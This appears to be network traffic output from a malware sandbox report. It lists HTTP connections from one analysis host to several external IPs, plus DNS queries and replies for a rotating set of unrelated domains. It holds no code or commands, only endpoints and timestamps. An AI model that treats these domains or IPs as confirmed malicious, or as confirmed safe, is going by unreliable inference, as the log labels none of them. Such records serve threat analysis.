Jul 4, 2024 12:36:26.646445990 CEST | 60625 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:26.651350975 CEST | 80 | 60625 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:26.651424885 CEST | 60625 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:26.653593063 CEST | 60625 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:26.658426046 CEST | 80 | 60625 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:26.686113119 CEST | 80 | 60625 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:29.177534103 CEST | 60626 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:29.182806015 CEST | 80 | 60626 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:29.182996035 CEST | 60626 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:29.185380936 CEST | 60626 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:29.190675974 CEST | 80 | 60626 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:29.190685034 CEST | 80 | 60626 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:29.190696955 CEST | 80 | 60626 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:29.190706015 CEST | 80 | 60626 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:29.190713882 CEST | 80 | 60626 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:29.190722942 CEST | 80 | 60626 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:29.190732002 CEST | 80 | 60626 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:29.190754890 CEST | 80 | 60626 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:29.191509008 CEST | 80 | 60626 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:29.263684988 CEST | 80 | 60626 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:31.709135056 CEST | 60627 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:31.714059114 CEST | 80 | 60627 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:31.714220047 CEST | 60627 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:31.720571995 CEST | 60627 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:31.725435972 CEST | 80 | 60627 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:45.501624107 CEST | 80 | 60624 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:45.501727104 CEST | 60624 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:53.107381105 CEST | 80 | 60627 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:53.113460064 CEST | 60627 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:53.117228031 CEST | 60627 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:53.122370005 CEST | 80 | 60627 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:59.240912914 CEST | 60628 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:36:59.245747089 CEST | 80 | 60628 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:36:59.249306917 CEST | 60628 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:36:59.253226042 CEST | 60628 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:36:59.254465103 CEST | 80 | 60628 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:36:59.254698038 CEST | 60628 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:36:59.258116961 CEST | 80 | 60628 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:36:59.259465933 CEST | 80 | 60628 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:01.771233082 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:01.776141882 CEST | 80 | 60629 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:01.776287079 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:01.781228065 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:01.786640882 CEST | 80 | 60629 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:03.284197092 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:03.597224951 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:03.692998886 CEST | 80 | 60629 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:03.693017006 CEST | 80 | 60629 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:03.693026066 CEST | 80 | 60629 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:03.693034887 CEST | 80 | 60629 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:03.693090916 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:03.693090916 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:03.693124056 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:03.693186998 CEST | 80 | 60629 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:03.693195105 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:03.693284988 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:03.694255114 CEST | 80 | 60629 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:03.695633888 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:03.753801107 CEST | 80 | 60629 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:03.770186901 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:03.795814991 CEST | 80 | 60629 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:03.826016903 CEST | 60629 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:04.302140951 CEST | 60630 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:04.626182079 CEST | 80 | 60630 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:04.649194002 CEST | 60630 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:04.649194002 CEST | 60630 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:04.688308954 CEST | 80 | 60630 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:04.688312054 CEST | 80 | 60630 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:04.688313007 CEST | 80 | 60630 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:04.688314915 CEST | 80 | 60630 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:04.688316107 CEST | 80 | 60630 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:04.688317060 CEST | 80 | 60630 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:04.688318014 CEST | 80 | 60630 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:04.688318014 CEST | 80 | 60630 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:04.688319921 CEST | 80 | 60630 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:04.688323975 CEST | 80 | 60630 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:07.161516905 CEST | 60631 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:07.166438103 CEST | 80 | 60631 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:07.166524887 CEST | 60631 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:07.168397903 CEST | 60631 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:07.173352957 CEST | 80 | 60631 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:07.874010086 CEST | 80 | 60631 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:07.874424934 CEST | 80 | 60631 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:07.874435902 CEST | 80 | 60631 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:07.874593019 CEST | 60631 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:07.874593019 CEST | 60631 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:07.879326105 CEST | 60631 | 80 | 192.168.2.4 | 172.80.82.186
Jul 4, 2024 12:37:07.884094000 CEST | 80 | 60631 | 172.80.82.186 | 192.168.2.4
Jul 4, 2024 12:37:13.024420977 CEST | 60632 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:13.029217958 CEST | 80 | 60632 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:13.029299021 CEST | 60632 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:13.031455994 CEST | 60632 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:13.036303997 CEST | 80 | 60632 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:13.551486015 CEST | 80 | 60632 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:13.551917076 CEST | 80 | 60632 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:13.552061081 CEST | 60632 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:14.569339037 CEST | 60632 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:15.552992105 CEST | 60633 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:15.558453083 CEST | 80 | 60633 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:15.558578968 CEST | 60633 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:15.560389996 CEST | 60633 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:15.563555002 CEST | 80 | 60633 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:15.563657045 CEST | 60633 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:15.565733910 CEST | 80 | 60633 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:15.568417072 CEST | 80 | 60633 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:18.084672928 CEST | 60634 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:18.092400074 CEST | 80 | 60634 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:18.137794971 CEST | 60634 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:18.137794971 CEST | 60634 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:18.143942118 CEST | 80 | 60634 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:18.143996000 CEST | 80 | 60634 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:18.144001007 CEST | 80 | 60634 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:18.144006014 CEST | 80 | 60634 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:18.144145966 CEST | 80 | 60634 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:18.144227982 CEST | 80 | 60634 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:18.144239902 CEST | 80 | 60634 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:18.144377947 CEST | 80 | 60634 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:18.144392967 CEST | 80 | 60634 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:18.152961016 CEST | 80 | 60634 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:20.630053997 CEST | 60635 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:20.638971090 CEST | 80 | 60635 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:20.644937038 CEST | 60635 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:20.644937038 CEST | 60635 | 80 | 192.168.2.4 | 194.195.220.41
Jul 4, 2024 12:37:20.650511026 CEST | 80 | 60635 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:20.660196066 CEST | 80 | 60635 | 194.195.220.41 | 192.168.2.4
Jul 4, 2024 12:37:25.713550091 CEST | 60636 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:25.718615055 CEST | 80 | 60636 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:25.718691111 CEST | 60636 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:25.721255064 CEST | 60636 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:25.726639032 CEST | 80 | 60636 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:25.822380066 CEST | 80 | 60636 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:28.270823956 CEST | 60637 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:28.305450916 CEST | 80 | 60637 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:28.305529118 CEST | 60637 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:28.307761908 CEST | 60637 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:28.315538883 CEST | 80 | 60637 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:28.941060066 CEST | 80 | 60637 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:28.941147089 CEST | 80 | 60637 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:28.941199064 CEST | 60637 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:28.941634893 CEST | 80 | 60637 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:28.941682100 CEST | 60637 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:29.815421104 CEST | 60637 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:30.834611893 CEST | 60638 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:30.839734077 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:30.839797974 CEST | 60638 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:30.842369080 CEST | 60638 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:30.848375082 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:30.848428965 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:30.848768950 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:30.848809958 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:30.848818064 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:30.848829985 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:30.848836899 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:30.848845005 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:30.848853111 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:31.488029003 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:31.488044977 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:31.488131046 CEST | 60638 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:31.488162041 CEST | 80 | 60638 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:31.488307953 CEST | 60638 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:32.346694946 CEST | 60638 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:33.367268085 CEST | 60639 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:33.372241020 CEST | 80 | 60639 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:33.375478983 CEST | 60639 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:33.379559040 CEST | 60639 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:33.380629063 CEST | 80 | 60639 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:33.383496046 CEST | 60639 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:33.384501934 CEST | 80 | 60639 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:33.384533882 CEST | 60639 | 80 | 192.168.2.4 | 162.0.236.122
Jul 4, 2024 12:37:33.388976097 CEST | 80 | 60639 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:33.389605045 CEST | 80 | 60639 | 162.0.236.122 | 192.168.2.4
Jul 4, 2024 12:37:46.693720102 CEST | 60640 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:46.699496984 CEST | 80 | 60640 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:46.699563026 CEST | 60640 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:46.701988935 CEST | 60640 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:46.708539963 CEST | 80 | 60640 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:47.336909056 CEST | 80 | 60640 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:47.336925030 CEST | 80 | 60640 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:47.337022066 CEST | 80 | 60640 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:47.342087030 CEST | 60640 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:48.206032991 CEST | 60640 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:49.246087074 CEST | 60641 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:49.251662016 CEST | 80 | 60641 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:49.265901089 CEST | 60641 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:49.265901089 CEST | 60641 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:49.272669077 CEST | 80 | 60641 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:49.276375055 CEST | 80 | 60641 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:51.786958933 CEST | 60642 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:51.792113066 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:51.792850971 CEST | 60642 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:51.838017941 CEST | 60642 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:51.843605995 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:51.843622923 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:51.843631983 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:51.843638897 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:51.843703985 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:51.843739033 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:51.843746901 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:51.843755007 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:51.843765020 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:52.321455956 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:52.322978020 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:52.322987080 CEST | 80 | 60642 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:52.323041916 CEST | 60642 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:53.706108093 CEST | 60642 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:54.724347115 CEST | 60643 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:54.729285955 CEST | 80 | 60643 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:54.729377985 CEST | 60643 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:54.731409073 CEST | 60643 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:54.738971949 CEST | 80 | 60643 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:55.226159096 CEST | 80 | 60643 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:55.226176977 CEST | 80 | 60643 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:55.226188898 CEST | 80 | 60643 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:55.226201057 CEST | 80 | 60643 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:55.226255894 CEST | 80 | 60643 | 52.1.217.30 | 192.168.2.4
Jul 4, 2024 12:37:55.226536989 CEST | 60643 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:55.226536989 CEST | 60643 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:55.255155087 CEST | 60643 | 80 | 192.168.2.4 | 52.1.217.30
Jul 4, 2024 12:37:55.262550116 CEST | 80 | 60643 | 52.1.217.30 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 4, 2024 12:35:33.200686932 CEST | 53 | 60169 | 162.159.36.2 | 192.168.2.4
Jul 4, 2024 12:35:33.711960077 CEST | 53 | 56230 | 1.1.1.1 | 192.168.2.4
Jul 4, 2024 12:35:54.950790882 CEST | 49414 | 53 | 192.168.2.4 | 1.1.1.1
Jul 4, 2024 12:35:54.997040033 CEST | 53 | 49414 | 1.1.1.1 | 192.168.2.4
Jul 4, 2024 12:36:10.603106022 CEST | 49215 | 53 | 192.168.2.4 | 1.1.1.1
Jul 4, 2024 12:36:10.619098902 CEST | 53 | 49215 | 1.1.1.1 | 192.168.2.4
Jul 4, 2024 12:36:23.756087065 CEST | 64360 | 53 | 192.168.2.4 | 1.1.1.1
Jul 4, 2024 12:36:24.104461908 CEST | 53 | 64360 | 1.1.1.1 | 192.168.2.4
Jul 4, 2024 12:36:58.132101059 CEST | 53235 | 53 | 192.168.2.4 | 1.1.1.1
Jul 4, 2024 12:36:59.128371000 CEST | 53235 | 53 | 192.168.2.4 | 1.1.1.1
Jul 4, 2024 12:36:59.238598108 CEST | 53 | 53235 | 1.1.1.1 | 192.168.2.4
Jul 4, 2024 12:36:59.238607883 CEST | 53 | 53235 | 1.1.1.1 | 192.168.2.4
Jul 4, 2024 12:37:12.881185055 CEST | 53119 | 53 | 192.168.2.4 | 1.1.1.1
Jul 4, 2024 12:37:13.021629095 CEST | 53 | 53119 | 1.1.1.1 | 192.168.2.4
Jul 4, 2024 12:37:25.681261063 CEST | 58136 | 53 | 192.168.2.4 | 1.1.1.1
Jul 4, 2024 12:37:25.711230993 CEST | 53 | 58136 | 1.1.1.1 | 192.168.2.4
Jul 4, 2024 12:37:38.397314072 CEST | 60709 | 53 | 192.168.2.4 | 1.1.1.1
Jul 4, 2024 12:37:38.409378052 CEST | 53 | 60709 | 1.1.1.1 | 192.168.2.4
Jul 4, 2024 12:37:46.476336002 CEST | 53861 | 53 | 192.168.2.4 | 1.1.1.1
Jul 4, 2024 12:37:46.690951109 CEST | 53 | 53861 | 1.1.1.1 | 192.168.2.4
Jul 4, 2024 12:38:00.240856886 CEST | 50234 | 53 | 192.168.2.4 | 1.1.1.1
Jul 4, 2024 12:38:00.712979078 CEST | 53 | 50234 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 4, 2024 12:35:54.950790882 CEST | 192.168.2.4 | 1.1.1.1 | 0xa14c | Standard query (0) | www.enrich-pet.com | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:36:10.603106022 CEST | 192.168.2.4 | 1.1.1.1 | 0x1a16 | Standard query (0) | www.alanbeanart.com | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:36:23.756087065 CEST | 192.168.2.4 | 1.1.1.1 | 0x9197 | Standard query (0) | www.qaronvc.lol | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:36:58.132101059 CEST | 192.168.2.4 | 1.1.1.1 | 0xf70e | Standard query (0) | www.piqia.top | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:36:59.128371000 CEST | 192.168.2.4 | 1.1.1.1 | 0xf70e | Standard query (0) | www.piqia.top | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:37:12.881185055 CEST | 192.168.2.4 | 1.1.1.1 | 0x8931 | Standard query (0) | www.cheapdesklamp.shop | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:37:25.681261063 CEST | 192.168.2.4 | 1.1.1.1 | 0xb0c5 | Standard query (0) | www.tofcomy.xyz | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:37:38.397314072 CEST | 192.168.2.4 | 1.1.1.1 | 0x72a5 | Standard query (0) | www.wepayassessments.com | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:37:46.476336002 CEST | 192.168.2.4 | 1.1.1.1 | 0xfff9 | Standard query (0) | www.wwfglobal.com | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:38:00.240856886 CEST | 192.168.2.4 | 1.1.1.1 | 0xfb54 | Standard query (0) | www.chefmikesrecipes.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 4, 2024 12:35:54.997040033 CEST | 1.1.1.1 | 192.168.2.4 | 0xa14c | No error (0) | www.enrich-pet.com | cdn1.wixdns.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 4, 2024 12:35:54.997040033 CEST | 1.1.1.1 | 192.168.2.4 | 0xa14c | No error (0) | cdn1.wixdns.net | td-ccm-neg-87-45.wixdns.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 4, 2024 12:35:54.997040033 CEST | 1.1.1.1 | 192.168.2.4 | 0xa14c | No error (0) | td-ccm-neg-87-45.wixdns.net | - | 34.149.87.45 | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:36:10.619098902 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a16 | No error (0) | www.alanbeanart.com | alanbeanart.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 4, 2024 12:36:10.619098902 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a16 | No error (0) | alanbeanart.com | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:36:10.619098902 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a16 | No error (0) | alanbeanart.com | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:36:24.104461908 CEST | 1.1.1.1 | 192.168.2.4 | 0x9197 | No error (0) | www.qaronvc.lol | - | 116.213.43.190 | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:36:59.238598108 CEST | 1.1.1.1 | 192.168.2.4 | 0xf70e | No error (0) | www.piqia.top | - | 172.80.82.186 | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:36:59.238607883 CEST | 1.1.1.1 | 192.168.2.4 | 0xf70e | No error (0) | www.piqia.top | - | 172.80.82.186 | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:37:13.021629095 CEST | 1.1.1.1 | 192.168.2.4 | 0x8931 | No error (0) | www.cheapdesklamp.shop | - | 194.195.220.41 | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:37:25.711230993 CEST | 1.1.1.1 | 192.168.2.4 | 0xb0c5 | No error (0) | www.tofcomy.xyz | - | 162.0.236.122 | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:37:38.409378052 CEST | 1.1.1.1 | 192.168.2.4 | 0x72a5 | Name error (3) | www.wepayassessments.com | none | none | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:37:46.690951109 CEST | 1.1.1.1 | 192.168.2.4 | 0xfff9 | No error (0) | www.wwfglobal.com | domain.enagicwebsystem.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 4, 2024 12:37:46.690951109 CEST | 1.1.1.1 | 192.168.2.4 | 0xfff9 | No error (0) | domain.enagicwebsystem.com | enagicwebsystem.com | - | CNAME (Canonical name) | IN (0x0001) | false
